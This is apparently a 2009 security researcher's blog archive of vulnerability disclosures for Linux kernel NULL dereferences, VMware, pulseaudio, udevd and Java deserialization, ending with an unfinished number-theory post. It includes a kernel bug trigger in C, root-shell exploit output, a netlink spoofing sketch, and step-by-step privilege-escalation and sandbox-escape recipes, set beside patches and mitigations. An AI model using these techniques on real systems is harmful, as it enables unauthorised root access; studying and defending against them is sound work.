Saturday, November 28, 2009

Virtualization security and the Intel privilege model

Earlier this month, Tavis and I spoke at PacSec 2009 in Tokyo about virtualisation security on Intel architectures, with a focus on CPU virtualisation.

During this talk, we briefly explained various techniques used for CPU virtualisation, such as dynamic translation (QEMU), VMware-style binary translation and paravirtualisation (Xen), and we went through bugs found by us and others:

- We released some details about MS09-033 (CVE-2009-1542), a bug we found in Virtual PC's instruction decoding
- We mentioned two of the awesome bugs found by Derek Soeder in VMware, CVE-2008-4915 and CVE-2008-4279
- We explained and demoed the exploitation of the mishandled exception on page fault bug in VMware that I previously blogged about.
- We released information on CVE-2009-3827, a bug we discovered in Virtual PC's hardware virtualisation.
Amusingly, the exact same bug was independently uncovered and corrected in KVM later by Avi Kivity (CVE-2009-3722). The reason may be that Intel's documentation is not perfectly clear about the differences between MOV_DR and MOV_CR events in hardware virtualisation.
This bug has already been addressed by Microsoft in Windows 7 and will be corrected in the next service pack for Virtual PC and Virtual Server.

If you are interested, you can download the slides here.

Friday, October 30, 2009

CVE-2009-2267: Mishandled exception on page fault in VMware

Tavis Ormandy and I recently released an advisory for CVE-2009-2267.

This is a vulnerability in VMware's virtual CPU which can lead to privilege escalation in a guest. All VMware virtualisation products were affected, including in hardware virtualisation mode.

In a VMware guest, in the general case, unprivileged (Ring 3) code runs without VMM intervention until an exception or interrupt occurs. An exception to this is Virtual-8086 mode (VM86), where VMware performs CPU emulation.

When VMware emulated a far call instruction in VM86 mode, it used supervisory access to push the CS and IP registers. Because of this, if that operation raised a Page Fault (#PF) exception, the resulting error code would be invalid: its user/supervisor flag would be incorrectly set.

This can be used to confuse a guest kernel. Moreover, VM86 mode can confuse the guest kernel even further, because it allows an attacker to load an arbitrary value into the code segment (CS) register.

We wrote a reliable proof of concept to elevate privileges on Linux guests. It turned out to be very easy because of the PNP BIOS recovery code.

For further details, check our advisory, VMware's advisory and the non-weaponized PoC (vmware86.c, vmware86.tar.gz), including Tavis' cool CODE32 macro.

Note that VMware silently patches their products until all of them are updated, and only then releases an advisory. If you updated VMware Workstation a few months ago, you were already protected against this vulnerability.

In theory, VMware's virtual CPU flaws could be treated like Intel or AMD errata and worked around in operating systems. In practice, since VMware's software can be updated, this is unlikely to happen. Moreover, VMware doesn't release the full details that could be used to produce workarounds.

If you like virtual CPU vulnerabilities, I suggest that you have a look at Derek Soeder's awesome advisory from last year.

Wednesday, October 14, 2009

Security in Depth for Linux Software

Chris Evans and I presented last week at Hack In The Box Malaysia about "Security in Depth for Linux software". You can find the slides here.

The talk was focused on writing good code and sandboxing.

The writing-good-code part used vsftpd as an example, since Chris has been getting this right for ten years now.

In the second part, we defined sandboxing, which we also call discretionary privilege dropping, as the ability to drop privileges programmatically and without administrative authority on the machine.

We explained some of the conceptual differences between sandboxing in this sense, where the application writer chooses to make part of his code run without certain privileges, and Mandatory Access Control systems, where the application itself doesn't make the policy.

From an application writer perspective, sandboxing facilities are desirable since they will allow your code to run with lower privileges on all machines. On the other hand, MAC is desirable from a system administrator or distribution maintainer perspective as it will allow one policy to rule over many applications and to enforce certain security properties on the system.

While Linux has a fair number of MAC systems available, sandboxing options are for now very limited. There is some hope that the ftrace framework or SELinux bounded types may allow this in the future (see also Adam Langley's post on LSMSB), but this will not be widely available anytime soon.

We demonstrated different ways of overcoming those limitations on readily available Linux kernels, focusing on three designs experimented with or used in vsftpd and Chromium.

Wednesday, September 16, 2009

CVE-2009-2793: Iret #GP on pre-commit handling failure: the NetBSD case

A few months ago, Tavis Ormandy and I used, on multiple occasions, the fact that iret can fail with a General Protection (#GP) exception before the processor "commits" to user mode (switches privileges by setting CS). More on this at the upcoming PacSec.

It's not necessarily obvious that an inter-privilege iret (typically from kernel mode to user mode) can fail before the privilege switch occurs. It is however the case if the restored EIP is past the code segment limit: a #GP exception will be raised while still in kernel mode.

When this occurs, an exception is raised from kernel mode with a handler in kernel mode: since there is no privilege level switch, no stack switch occurs and the trap frame will not contain saved stack information.

If an operating system's kernel does not expect this to happen, it may assume a full trap frame with saved stack registers. This is what happens in NetBSD.

An interesting point in the NetBSD case is that due to the lazy handling of non-executable stack emulation, a legitimate program could trigger the bug:
  1. The legitimate program has code on the stack, for instance due to a GCC-generated trampoline for a nested function.
  2. The stack will be marked as executable, but the code segment limit will not be raised yet: on stack execution, the kernel will handle the #GP exception and raise the limit (lazy handling).
  3. A signal handler gets set to this nested function.
  4. The kernel delivers a signal to the process and irets to the code on the stack, thus raising #GP pre-commit.
You can read our full NetBSD related advisory here (CVE-2009-2793).

Friday, August 28, 2009

CVE-2009-2698: udp_sendmsg() vulnerability

EDIT: p0c73n1 has posted an exploit for this to milw0rm, and spender wrote "the rebel"

Tavis Ormandy and I recently reported CVE-2009-2698, which was disclosed at the beginning of the week.

This flaw affects at least Linux 2.6 versions prior to 2.6.19.

When we ran into this, we realized that the newest kernel versions were not affected by the PoC code we had. The reason was that Herbert Xu had found and corrected a closely related bug. Linux distributions running 2.6.18 and earlier kernels did not realize the security impact of this fix and did not backport it.
This is a good example of how hard it is to backport relevant fixes to maintained stable versions of the kernel.

If you look at udp_sendmsg(), you will see that the rt route entry is initialized to NULL and that some code paths can lead to calling ip_append_data() with a NULL rt. ip_append_data() obviously doesn't handle this case properly and will cause a NULL pointer dereference.

Note that this is a data NULL pointer dereference, and mapping code at page zero will not lead to immediate privileged code execution for a local attacker. However, controlling the rtable structure seems to give the attacker enough control to elevate privileges.

Since it's hard to guarantee that ip_append_data will never be called with a NULL *rtp, we believe that this function should be made more robust by using this patch.

Here's one way to trigger this vulnerability locally:

$ cat croissant.c
#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>

int main(int argc, char **argv)
{
  int fd = socket(PF_INET, SOCK_DGRAM, 0);
  char buf[1024] = {0};
  struct sockaddr to = {
    .sa_family = AF_UNSPEC,
    .sa_data = "TavisIsAwesome",
  };

  /* the first call corks the socket with MSG_MORE; the second one
     then reaches ip_append_data() with a NULL rt */
  sendto(fd, buf, 1024, MSG_PROXY | MSG_MORE, &to, sizeof(to));
  sendto(fd, buf, 1024, 0, &to, sizeof(to));

  return 0;
}
An effective implementation of mmap_min_addr or the UDEREF feature of PaX/GrSecurity would prevent local privilege escalation through this issue.

Thursday, August 13, 2009

Linux NULL pointer dereference due to incorrect proto_ops initializations (CVE-2009-2692)

EDIT2: Here is RedHat's official mitigation recommendation
EDIT3: Brad Spengler also wrote an exploit for this and published it. The bug triggering is based on our exploit, which leaked to Brad through the private vendor-sec mailing list. He implements the personality trick Tavis and I published in June to bypass mmap_min_addr and also makes use of a feature that allows any unconfined user to gain the right to map at address zero in Red Hat's default SELinux policy. He wrote a reliable shellcode for this one that should work pretty much anywhere on x86 and x86_64 machines.
EDIT4: if you use Debian or Ubuntu on your machine, I have specifically updated the kernelsec Debian/Ubuntu GrSecurity packages to protect against this bug and others.
EDIT5: Zinx wrote an ARM Android root exploit
EDIT6: Ramon de Carvalho Valle wrote a PPC/PPC64/x86_64/i386 exploit

Tavis Ormandy and I recently found and investigated a Linux kernel vulnerability (CVE-2009-2692). It affects all 2.4 and 2.6 kernels since 2001 on all architectures. We believe this is the public vulnerability affecting the greatest number of kernel versions.

The issue lies in how Linux deals with unavailable operations for some protocols. sock_sendpage and others don't check for NULL pointers before dereferencing operations in the ops structure. Instead, the kernel relies on those proto_ops structures being correctly initialized with stubs (such as sock_no_sendpage) rather than NULL pointers.

At first sight, the code in af_ipx.c looks correct and seems to initialize .sendpage properly. However, due to a bug in the SOCKOPS_WRAP macro, sock_sendpage will not be initialized. This code is very fragile and there are many other protocols where proto_ops are not correctly initialized at all (vulnerable even without the bug in SOCKOPS_WRAP), see bluetooth for instance.

So it was decided that instead of patching all those protocols and continuing to rely on this very fragile code, sock_sendpage would be patched to check against NULL. This was already the way sock_splice_read and others were handled.

Since it leads to the kernel executing code at NULL, the vulnerability is as trivial to exploit as it can get (edit: that's for local privilege escalation, and on Intel architectures): an attacker can just put code in the first page and it will get executed with kernel privileges. Our exploit took a few minutes to adapt from a previous one:

$ ./leeches
// ------------------------------------------------------

// sendpage linux local ring0
// ----------------,
// leeches.c:Aug 11 2009
// GreetZ: LiquidK, lcamtuf, Spoonm, novocainated, asiraP, ScaryBeasts, spender, pipacs, stealth, jagger, redpig, Neel and all the other leeches we forgot to mention!
Enjoy some photography while at ring0 @
For our webapp friends, here is an XSS executing at ring 0: javascript:alert(1);
shellcode now executing chmod("/bin/sh", 04755), welcome to ring0
$ sh
# id
uid=1000(julien) gid=1000(julien) euid=0(root)
On x86/x86_64, this issue could be mitigated by three things:
  • the recent mmap_min_addr feature. Note that this feature has had known issues until at least recent versions. See also this LWN article.
  • on IA32 with PaX/GrSecurity, the KERNEXEC feature (x86 only)
  • not implementing affected protocols (a.k.a., reducing your attack surface by disabling what you don't need): PF_APPLETALK, PF_IPX, PF_IRDA, PF_X25, PF_AX25, PF_BLUETOOTH, PF_IUCV, IPPROTO_SCTP/PF_INET6, PF_PPPOX, PF_ISDN, but there may be more. (Update: See RedHat's mitigation)
This patch should be applied to fix this issue.

You can read our advisory here.

Note: this has been featured on Slashdot, OSNews, TheRegister, ZDNet and others

Thursday, July 16, 2009

Old school local root vulnerability in pulseaudio (CVE-2009-1894)

Today was chosen as disclosure day for CVE-2009-1894.

Tavis Ormandy and I recently used the fact that pulseaudio is set-uid root to bypass Linux' NULL pointer dereference prevention. This technique relies on a limitation in the Linux kernel, not on a bug in pulseaudio. But we also found one unrelated bug in pulseaudio.

Since it's set-uid root, we thought we would give pulseaudio a quick look. In the very first lines of main(), you can find the following:

if (!getenv("LD_BIND_NOW")) {
    char *rp;

    pa_assert_se(rp = pa_readlink("/proc/self/exe"));
    pa_assert_se(execv(rp, argv) == 0);
}
So pulseaudio re-executes itself through /proc/self/exe so that the dynamic linker performs all relocations immediately at load time.

There is an obvious race condition here. /proc/self/exe is a symbolic link to the actual pathname of the executed command: by creating a hard link to /usr/bin/pulseaudio, we control this pathname, and consequently the file under this pathname. Knowing this, the exploitation is trivial (Note that rename() is atomic, or alternatively note how __d_path() works with deleted entries).

It's also interesting to note that any operation performed on /proc/self/exe is guaranteed by the kernel to be performed on the same inode as the one that got executed (see proc_exe_link), something that two of my colleagues recently pointed out to me. So if they had re-executed themselves by using /proc/self/exe directly, without going through readlink() first, they would not have been vulnerable. And actually, they weren't vulnerable before; if you read the ChangeLog, you'll find:

2007-10-29 15:33 lennart * : use real path of binary instead of /proc/self/exe to execute ourselves

Oops! (Thanks to my colleague Mike Mammarella for digging this)

Like the vulnerability in udevd, this is a very good example of a non memory corruption vulnerability which is trivial to exploit very reliably and in a cross-architecture way.

So, why does pulseaudio have the set-uid bit set, you may ask? For real-time performance reasons: it wants to keep CAP_SYS_NICE but will drop all other privileges.

This vulnerability could have been avoided if the principle of least privilege had been followed: since no privileges are required to re-exec yourself, dropping privileges should have been the first thing pulseaudio did. Here it's only the second thing it does, and that was enough to make most Linux desktops vulnerable.

If your distribution of choice did not patch this yet, or if you want to reduce your attack surface, you're advised to chmod u-s /usr/bin/pulseaudio. Also note that, as with every setuid binary update, you should check that your users didn't create "backup" vulnerable copies (hard links), waiting to own your box with known vulnerabilities while you think you are safe from those.

PS: Here are two brain teasers for you:

1. Find a cool way to perform an action after execve() has succeeded in another process, but before main() executes. First, I used a FD_CLOEXEC read descriptor in a pipe and a SIGPIPE handler, but while it gives good results in practice, there is no guarantee as to when the signal will get delivered. I finally found (with a hint from Tavis) a 100% reliable way to do it that is always guaranteed to work at first try. Of course, such a level of sophistication is absolutely not needed for this exploit.

2. Since pulseaudio allows you to load arbitrary libraries, it allows you to run arbitrary code with CAP_SYS_NICE as a feature. In the light of NUMA coming to the desktop through QPI, can you do something more interesting than what you would first expect with this?

Friday, June 26, 2009

Bypassing Linux' NULL pointer dereference exploit prevention (mmap_min_addr)

EDIT3: Slashdot, the SANS Institute, Threatpost and others have a story about an exploit by Bradley Spengler which uses our technique to exploit a null pointer dereference in the Linux kernel.
EDIT2: As of July 13th 2009, the Linux kernel integrates our patch (2.6.31-rc3). Our patch also made it into -stable.
EDIT1: This is now referenced as a vulnerability and tracked as CVE-2009-1895

NULL pointer dereferences are a common security issue in the Linux kernel.

In the realm of userland applications, exploiting them usually requires being able to somehow control the target's allocations until you get page zero mapped, and this can be very hard.

In the paradigm of locally exploiting the Linux kernel, however, nothing (before Linux 2.6.23) prevented you from mapping page zero with mmap() and crafting it to suit your needs before triggering the bug in your process' context. Since the kernel's data and code segments both have a base of zero, a null pointer dereference would make the kernel access page zero, a page filled with bytes under your control. Easy.

This used not to be the case back in Linux 2.0, when the kernel data segment's base was above PAGE_OFFSET and the kernel had to explicitly use a segment override (with the fs selector) to access data in userland. The same rough idea is now used in PaX/GrSecurity's UDEREF to prevent exploitation of "unexpected to userland kernel accesses" (it actually makes use of an expand-down segment instead of a PAGE_OFFSET segment base, but that's a detail).

Kernel developers tried to solve this issue too, but without resorting to segmentation (which is considered deprecated and is mostly not available on x86_64) and in a portable (cross-architecture) way. In 2.6.23, they introduced a new sysctl, called vm.mmap_min_addr, that defines the minimum address you can request a mapping at. Of course, this doesn't solve the complete issue of "to userland pointer dereferences" and it also breaks the somewhat useful feature of being able to map the first pages (this breaks Dosemu for instance), but in practice it has been effective enough to make exploitation of many vulnerabilities harder or impossible.

Recently, Tavis Ormandy and myself had to exploit such a condition in the Linux kernel. We investigated a few ideas, such as:
  • using brk()
  • creating a MAP_GROWSDOWN mapping just above the forbidden region (usually 64K) and segfaulting the last page of the forbidden region
  • obscure system calls such as remap_file_pages
  • putting memory pressure in the address space to let the kernel allocate in this region
  • using the MMAP_PAGE_ZERO personality
None of them worked at first: the LSM hook responsible for this security check was correctly called every time.

So what does the default security module do in cap_file_mmap? This is the relevant code (in security/capability.c on recent versions of the Linux kernel):
if ((addr < mmap_min_addr) && !capable(CAP_SYS_RAWIO))
    return -EACCES;
return 0;
Meaning that a process with CAP_SYS_RAWIO can bypass this check. How can we get our process to have this capability? By executing a setuid binary, of course! So we set the MMAP_PAGE_ZERO personality and execute a setuid binary. Page zero will get mapped, but the setuid binary is executing and we don't have control anymore.
So, how do we get control back? Using something such as "/bin/su our_user_name" could be tempting: while this would indeed give us control back, su will drop privileges before doing so (it'd be a vulnerability otherwise!), so the Linux kernel will make its exec fail in the cap_file_mmap check (due to the MMAP_PAGE_ZERO personality).

So what we need is a setuid binary that will give us control back without going through exec. We found such a setuid binary that is installed on many desktop Linux machines by default: pulseaudio. pulseaudio will drop privileges and let you specify a library to load through its -L argument. Exactly what we needed!

Once we have one page mapped in the forbidden area, it's game over: nothing prevents us from using mremap() to grow the area and mprotect() to change our access rights to PROT_READ|PROT_WRITE|PROT_EXEC. This completely bypasses the Linux kernel's protection.

Note that apart from this problem, the mere fact that MMAP_PAGE_ZERO is not in the PER_CLEAR_ON_SETID mask and thus is allowed when executing setuid binaries can be a security issue: being able to map page zero in a process with euid=0, even without controlling its content could be useful when exploiting a null pointer vulnerability in a setuid application.

We believe that the correct fix for this issue is to add MMAP_PAGE_ZERO to the PER_CLEAR_ON_SETID mask.
PS: Thanks to Robert Swiecki for some help while investigating this.

Thursday, May 28, 2009

Time-stamp counter disabling oddities in the Linux kernel

The time-stamp counter (TSC) is part of the performance monitoring facilities provided on Intel processors. It's stored in a 64-bit MSR. Except for 64-bit wraparound (and of course reset), the TSC is guaranteed by Intel to be monotonically increasing, but not necessarily at a constant rate.
Historically, the TSC increased with every internal processor clock cycle, but now the rate is usually constant (even if the processor changes frequency) and usually equals the maximum processor frequency.

There are multiple ways of reading the value of the TSC MSR; a popular one is the RDTSC instruction. This instruction loads the value into EDX:EAX and is not privileged unless the Time-Stamp Disable (TSD) bit is set in CR4. Most operating systems will not set CR4.TSD for any thread, so programmers are free to use RDTSC in their Ring 3 code.

The problem is that the TSC has been used as a tool in the past to mount side channel attacks. Two examples are "Cache Attacks and Countermeasures: the Case of AES" by Osvik, Shamir and Tromer and "Cache missing for fun and profit" by Colin Percival. (Less importantly, it has also been used to create exploits against race conditions in the Linux kernel such as this one)

In an attempt to kill RDTSC as a tool to conduct various mischiefs, Andrea Arcangeli, author of the SECCOMP prctl (that allows a thread to enter a sandboxed "computing mode" where only read, write, exit and sigreturn syscalls are allowed) tried to disable RDTSC by setting CR4.TSD in any thread that runs under seccomp (in 2.6.12).

That's where the oddities begin: I was recently surprised to see that a process I ran under seccomp actually had access to rdtsc. A quick look at the source code of my kernel revealed this:

#ifdef TIF_NOTSC

Note that TIF_NOTSC is not a config option! So I took a look at both thread_info_64.h and thread_info_32.h and discovered that TIF_NOTSC was not defined in the 64-bit version. As a consequence, a 32-bit kernel will disable the TSC in seccomp threads but a 64-bit kernel will not (even for 32-bit processes). Chris Evans blogged previously about how a seemingly simple security technology such as seccomp could still have bugs. "Here's another one," I thought.

While tracking this bug down, I found out that it wasn't a bug but a conscious decision by Andi Kleen not to disable the TSC on x86_64 (patch applied in 2.6.14), for performance reasons. I consider this a really odd decision: seccomp behaving differently on 64-bit and 32-bit kernels is nonsense! If you consider TSC disabling a security feature, it has to behave consistently, or you should just remove it altogether. Here is a thread, started in November 2005 by Andrea Arcangeli, who also regretted the lack of consistency.

But then, in Linux 2.6.23, this feature became impact-free, performance-wise. So at that point, I really consider not having it on x86_64 kernels a bug, not just a strange decision. As I mentioned previously, the bug is due to TIF_NOTSC not being defined for 64-bit kernels.
I wondered if this bug would still be there in recent Linux kernels despite the ongoing i386 and x86_64 merge. It wasn't in 2.6.27, where thread_info_64.h and thread_info_32.h were merged into one thread_info.h file. In fact, it had already been corrected in 2.6.26, at the same time as a new feature, prctl(PR_SET_TSC), was introduced.

PR_SET_TSC lets you control the CR4.TSD flag for your thread: you can make your thread SIGSEGV on rdtsc. And this feature is another big oddity to me: if you consider rdtsc harmful, it would make sense to let a process drop the privilege to use RDTSC, but the weird thing here is that nothing forbids you from calling prctl(PR_SET_TSC) again to clear the TSD flag and restore your privilege to use rdtsc! So I can't imagine what this is for; the only use case I can see would be in a ptrace sandbox.

Another use case would have been SECCOMP, of course. By removing the automatic TSC disabling from seccomp, a thread could use PR_SET_TSC prior to using PR_SET_SECCOMP if it wanted to disable rdtsc, thus making this behavior configurable. Since a thread under seccomp cannot call prctl(), the thread wouldn't have been able to re-enable it. The problem would have been that existing code relying on SECCOMP might expect to drop TSC access without having to use PR_SET_TSC. But wait! This feature had never worked on x86_64 in the first place; it was the perfect time to change the behavior and finally fix this bug. Another oddity!

I should also discuss the whole idea of forbidding access to the useful rdtsc instruction in the first place. Could an attacker emulate it anyway with a thread on another processor incrementing a counter manually? Are the RTC, HPET or the gtod_data counter in the vsyscall page usable? How realistic are those side channel attacks in the first place? If they are, when could this become the easiest attack you can perform on a system? That will be for another post.

Tuesday, May 19, 2009

Write once, own everyone, Java deserialization issues

EDIT3: This vulnerability has been nominated for a Pwnie Award for "best client-side bug"!
EDIT 2: On June 15th 2009, Apple has updated Java on MacOS X with a version that fixes this issue.
EDIT 1: this has been featured on Slashdot, Ars Technica, ZDNet, OSnews and many others. The focus was on the fact that this is still not fixed on MacOS X. However, keep in mind that you may still be at risk if you use another operating system (Windows, Linux), especially with an outdated version of Java, which is very common. You should disable Java applets in your browser if you can, or at least consider using NoScript.

It is time to talk about my favorite client-side vulnerability ever. Surprisingly (if you know me), this is a Java vulnerability, or rather a class of Java vulnerabilities, that allows one to completely bypass the Java sandbox and execute arbitrary code remotely in Java-enabled web browsers.
This was found by Sami Koivu. He reported the first instance of it (CVE-2008-5353) to Sun on August 1st 2008, and this instance was fixed by Sun on December 3rd 2008. These vulnerabilities are both technically interesting and have a lot of impact.

Since they share core classes, OpenJDK, GIJ, IcedTea and Sun's JRE were all vulnerable at some point. And unfortunately, this vulnerability is still not fixed everywhere.

I've been wanting to talk about this for a while. I was holding off while Apple was working to patch this vulnerability. Unfortunately, it is still not patched in their latest security update from just a few days ago. I believe that since this vulnerability has already been public for almost 6 months, making MacOS X users aware that Java needs to be disabled in their browser is the right thing to do.

As a side note, Sami Koivu and I paired at the latest Pwn2Own (his vulnerability, my exploit) and owned both Firefox and Safari on MacOS X on day one (Java is there and enabled by default on MacOS X). Unfortunately, it fell outside the challenge criteria because the vulnerability had already been reported to Sun and I had already pinged Apple about it in January.

So let's talk about the first reported instance of this class of vulnerabilities, the Calendar deserialization vulnerability.

For legacy reasons, the deserialization of the sun.util.calendar.ZoneInfo object in a java.util.Calendar has to be fine-tuned, so the readObject() method in the Calendar class handles it. However, an applet cannot access sun.util.calendar.ZoneInfo, because it is inside "sun" and anything in "sun" has to be trusted for the Java applet security model to hold.
For this reason, the code responsible for the ZoneInfo deserialization has to run with privileges. The code in java.util is trusted and can get more privileges by using a doPrivileged block:
try {
    ZoneInfo zi = (ZoneInfo) AccessController.doPrivileged(
        new PrivilegedExceptionAction() {
            public Object run() throws Exception {
                return input.readObject();
            }
        });
    if (zi != null) {
        zone = zi;
    }
} catch (Exception e) {}

So what does this buy us? We can craft an input and deserialize objects from it. By deserializing a Calendar, we can get a ZoneInfo object deserialized in a privileged context. Wait! How do they check that this is a ZoneInfo object? They let Java's type checking do it for them. So if we carefully craft our input, we can get an arbitrary object deserialized; it just won't get assigned to zi unless it's a valid ZoneInfo.

To exploit this, let's find a class that we would be forbidden to instantiate in an applet because it would allow us to escape from the Java sandbox. The RuntimePermission class is a great source of inspiration. A ClassLoader seems to be exactly what we are looking for! Let's make our own ClassLoader subclass and override the readObject() method. This method will be called during deserialization. In this method, we can assign ourselves (this) to a static field so that our shiny new ClassLoader doesn't get garbage collected and so that we can use it later.

With our own ClassLoader we can define classes with our own ProtectionDomain (with arbitrary privileges). That's it!

There is more work to do: the overall exploit can be quite complex (mine is over 500 lines, but you can make a simpler version), but you get the basic idea.
There is also the problem of manually crafting the malicious serialized file. In a first version, I did this by re-implementing the serialization protocol. Later I found a nice trick: by overriding replaceObject(), you can let Java do all the work for you.

I've mentioned that this is a class of vulnerabilities: the reason is that with this design, every time Java code deserializes attacker-controlled input in a privileged context, it's a security vulnerability. Sun fixed the Calendar vulnerability (see this patch) by creating a new accessClassInPackage.sun.util.calendar privilege and restricting the doPrivileged block to it, so they didn't fix the whole class of them (more on this in a later post).

That's it for the technical part.

Now, why do I think this client-side arbitrary remote code execution vulnerability is more interesting than most others?

First, according to Adobe and Sun, Java is available in 80% to 90% of all web browsers, which makes it a nice target.

Secondly, for various reasons, Java is usually poorly updated:
  • The Sun Java update mechanism isn't tied to the operating system update system on the Windows platform. Home users and companies don't update it often; some of them have processes in place to deal with Microsoft's Patch Tuesdays but don't for other software updates.
  • Many companies are using web applications or Java software that rely on a specific Java version. It may be tedious to update Java because it would break many things. This may be the reason why Apple's Java updates are so infrequent.
  • Some Linux distributions don't support Sun's JRE (proprietary software) despite making it available. When I asked Ubuntu to fix this vulnerability, they fixed OpenJDK quickly but told me the Sun JRE was not supported (despite it being available by default on the latest Ubuntu LTS release).
Third, and this is the important point: most other client-side vulnerabilities that can lead to arbitrary code execution, including other Java vulnerabilities, are memory corruption vulnerabilities in components written in native code. Exploiting those reliably can be hard, especially if you have to deal with multiple operating system versions or with PaX-like protections such as DEP and ASLR.
This one is a pure Java vulnerability. This means you can write a 100% reliable exploit in pure Java. This exploit will work on all the platforms, all the architectures and all the browsers! Mine has been tested on Firefox, IE6, IE7, IE8, Safari and on MacOS X, Windows, Linux and OpenBSD and should work anywhere.

This is close to the holy grail of client-side vulnerabilities.

So MacOS X users, please disable Java in your web browser.
Others: make sure you have updated Java and still disable it in your web browser: it's a huge attack surface and it suffers from many other security vulnerabilities.
Moreover, even without taking into consideration Java vulnerabilities themselves, since the Java plugin allocates all memory as RWX and doesn't opt-in for randomization, a Java applet can be used to bypass ASLR and non executability (DEP on Windows) in browser exploits.

You can also get some information about this vulnerability on Sami Koivu's blog, here and here, and a timeline for some of the bugs he reported to Sun here.

Wednesday, April 22, 2009

Local bypass of Linux ASLR through /proc information leaks

EDIT2: Thanks to the efforts of Jake Edge, who noticed our presentation, the /proc/pid/stat information leak is now at least partially patched in the mainline kernel, since
EDIT1: This is featured in an LWN article by Jake Edge

Tavis Ormandy and myself talked about locally bypassing address space layout randomization (ASLR) in Linux in a lightning talk at CanSecWest.

From Linux 2.6.12 to Linux 2.6.21, you could completely bypass ASLR when targeting local processes by reading /proc/pid/maps. Since Linux 2.6.22, if you cannot ptrace "pid", then you will see an empty /proc/pid/maps.

It has been known for at least 7 years now that /proc/pid/stat and /proc/pid/wchan could also leak sensitive information. Reading this information has been prevented in GRSecurity since the beginning as well as in this patch.
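As a minimal sketch of the /proc/pid/stat leak (field positions per the proc(5) man page; on kernels carrying the later fix these fields may simply read as 0 for processes you cannot ptrace):

```python
# Fields 29 and 30 of /proc/pid/stat (1-indexed; kstkesp and kstkeip in
# proc(5)) expose a task's saved stack and instruction pointers, which is
# enough to start inferring its address space layout despite ASLR.
def stat_sp_ip(pid="self"):
    with open(f"/proc/{pid}/stat") as f:
        data = f.read()
    # the comm field (field 2) may contain spaces, so split after the ')'
    fields = data[data.rindex(")") + 2:].split()
    # fields[0] is stat field 3 (state); kstkesp/kstkeip are fields 29/30
    return int(fields[26]), int(fields[27])

sp, ip = stat_sp_ip()
print(hex(sp), hex(ip))
```

Sampling these two values repeatedly while the target runs narrows down where its stack and code live, which is the idea behind Tavis' tool.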

The question was: could you exploit this information to bypass ASLR in practice?
If you want to find out, it's easy: we've just published the slides and Tavis' tool!

Thursday, April 16, 2009

Interesting vulnerability in udevd

I used to love exploiting memory corruption vulnerabilities. It usually requires some reverse engineering, good knowledge of the underlying operating system and some ingenuity to write reliable exploits. And if you try to circumvent clever protections such as PaX, it can get very tricky.

But besides kernel vulnerabilities, exploitable memory corruption vulnerabilities these days are mostly buffer overflows. It's a bit monotonous.

I get more excited by other kinds of vulnerabilities, such as Solaris' telnet -froot or the Debian/OpenSSL fiasco.

Last night, my friend Raph pointed me to this udev flaw. If you read this patch you can notice an extra check in get_netlink_msg():
if ((snl.nl_groups != 1) || (snl.nl_pid != 0))

This checks that the message received by udevd was sent to a specific multicast group (sending to netlink multicast groups is privileged and can only be done with CAP_NET_ADMIN) and that it was sent from the kernel's unicast address.

From there, the vulnerability is pretty obvious: before the patch, udevd didn't check the origin of the messages it received through netlink.

So can we spoof the kernel and send arbitrary messages to udevd? Yes! And it's easy: it suffices to create a NETLINK socket with the NETLINK_KOBJECT_UEVENT protocol and to send a unicast message to the correct unicast address. For udevd, this address is the pid of the process that bound the NETLINK socket (udevd's parent). You can easily find it in /proc/net/netlink (thanks Phil). Et voilà!
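A rough Python sketch of the message side (the uevent wire format, "ACTION@DEVPATH" followed by NUL-terminated KEY=VALUE pairs, mirrors what the kernel broadcasts; the device path here is illustrative, and the actual send is of course rejected on patched systems):

```python
NETLINK_KOBJECT_UEVENT = 15  # protocol number from <linux/netlink.h>

def build_uevent(action, devpath, env):
    # udevd parses "ACTION@DEVPATH" followed by NUL-terminated KEY=VALUE pairs
    msg = f"{action}@{devpath}\0"
    msg += "".join(f"{k}={v}\0" for k, v in env.items())
    return msg.encode()

payload = build_uevent("remove", "/class/mem/full",
                       {"ACTION": "remove",
                        "DEVPATH": "/class/mem/full",
                        "SUBSYSTEM": "mem"})

# Spoofing the kernel then amounts to a plain unicast sendto() towards the
# pid that bound the uevent socket (found in /proc/net/netlink), e.g.:
#   import socket
#   s = socket.socket(socket.AF_NETLINK, socket.SOCK_DGRAM,
#                     NETLINK_KOBJECT_UEVENT)
#   s.sendto(payload, (udevd_parent_pid, 0))
```

On a vulnerable udevd, such a message is indistinguishable from a genuine kernel uevent.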

My idea for exploiting this was to create a mode-666 device node giving direct access to a mounted partition, then chmod +s some binary we control by writing directly to the block device (there are userland tools and libraries to do this easily, see debugfs for instance).

Phil also came up with the idea of replacing /dev/urandom and /dev/random with /dev/zero (the so-called "Debian emulation" backdoor).
Raph then found an even better way: on Ubuntu, Debian and others, you can exploit "95-udev-late.rules" and run arbitrary commands by using the "remove" action.

And that's it for a slick exploit. 40 lines of C (5 lines of Python for Phil). Pretty simple, cross architecture, reliable.
And it can escape chroots and some MAC-constrained environments (as long as you can create netlink sockets).

Saturday, April 4, 2009


Yesterday, a friend of mine turned 26. I know what you're thinking, this is very exciting. Indeed, it's not every year that your age sits between a square (5^2) and a cube (3^3)!

How often does this happen? Well, Wikipedia actually states that 26 is the only number between a square and a cube (which is not exactly true, but read on). I thought this was cool, let my friend know in a creepy happy-birthday e-mail and got back to work.

But the same day, I was dragged to a Polish club by friends. It was horrible: the music was awful, absolutely nobody was dancing, nobody was talking and nothing happened. I was very bored, so I started working on the proof that 26 is the only number between a square and a cube. Apart from the fact that the bouncer seemed worried that I was standing still (and alone, remember) on the dance floor, it was the perfect activity for that club.
I first thought it would be easy, but as it turned out the demonstration ended up involving quadratic integer rings and unique factorization domains.

So let's start by demonstrating that 26 is the only number preceded by a square and followed by a cube. We want to find all integers a and b such that b^3=a^2+2.
You can easily prove that a and b are odd: if b is even, 2 divides a^2, so 2 divides a and 4 divides a^2. Consequently, 4 divides b^3 - a^2 so 4 divides 2. Impossible. So b is odd, which implies a^2 is odd and a is odd.

Then, my first intuition was to use the known solution to this equation to prove there was no other solution. a^2-5^2=b^3-3^3, so (a-5)(a+5)=(b-3)(b^2+3b+9). But this is tedious, there isn't much you can do with this annoying (b^2+3b+9).
Well, that's as far as I got in the club. I made one last attempt at getting the others to party, then decided to head home and started working on the proof again. Sad Friday night.

